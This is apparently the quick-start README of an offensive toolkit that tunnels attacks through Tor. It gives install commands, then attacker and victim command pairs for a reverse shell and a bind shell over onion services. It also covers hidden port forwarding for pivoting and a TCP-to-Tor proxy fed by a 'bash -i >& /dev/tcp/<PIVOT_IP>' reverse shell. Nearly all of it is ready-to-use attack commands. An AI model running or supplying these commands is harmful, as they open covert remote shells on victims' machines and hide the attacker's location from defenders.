## TL;DR
### Download Offensive Tor Toolkit

```bash
# Resolve the latest tagged release (vX.Y...) from the GitHub releases API
export VERSION=$(
  curl -s "https://api.github.com/repos/atorrescogollo/offensive-tor-toolkit/releases" \
    | jq -r '.[].name | select(. | test("v[0-9]+\\."))' \
    | sort -rV | head -1
)
# Download the release
wget "https://github.com/atorrescogollo/offensive-tor-toolkit/releases/download/${VERSION}/offensive-tor-toolkit-${VERSION}.tar.gz"
# Uncompress
tar -xvzf "offensive-tor-toolkit-${VERSION}.tar.gz"
# Move to /opt/offensive-tor-toolkit/
sudo mv offensive-tor-toolkit-${VERSION}* /opt
sudo ln -sf "offensive-tor-toolkit-${VERSION}" /opt/offensive-tor-toolkit
cd /opt/offensive-tor-toolkit
```
### Reverse Shell over Tor

**Attacker**

```console
$ grep '^HiddenServicePort' /etc/tor/torrc
HiddenServicePort 4444 127.0.0.1:4444
$ nc -lvnp 4444
```

**Victim**

```console
$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444
```
### Bind Shell over Tor

**Victim**

```console
$ ./hidden-bind-shell -data-dir /tmp/datadir/ -hiddensrvport 1234
...
Bind shell is listening on hgnzi...g6yew.onion:1234
```

**Attacker**

```console
$ alias nctor='nc --proxy 127.0.0.1:9050 --proxy-type socks5'
$ nctor -v hgnzi...g6yew.onion 1234
```
### Hidden Port Forwarding

**Victim/Pivot**

```console
$ ./hidden-portforwarding -data-dir /tmp/pf-datadir -forward 127.0.0.1:1111 -hidden-port 9001
...
Forwarding xa7l...a4el.onion:9001 -> 127.0.0.1:8080
```

**Attacker**

```console
$ alias curltor="curl --socks5-hostname 127.0.0.1:9050"
$ curltor http://xa7l...a4el.onion:9001/
```
### TCP2Tor Proxy

**Attacker**

```console
$ grep '^HiddenServicePort' /etc/tor/torrc
HiddenServicePort 4444 127.0.0.1:4444
$ nc -lvnp 4444
```

**Pivot**

```console
$ ./tcp2tor-proxy -listen 0.0.0.0:60101 -onion-forward m5et..jyd.onion:4444
...
Proxying 0.0.0.0:60101 -> m5et..jyd.onion:4444
```

**Victim**

```console
$ bash -i >& /dev/tcp/<PIVOT_IP>/60101 0>&1
```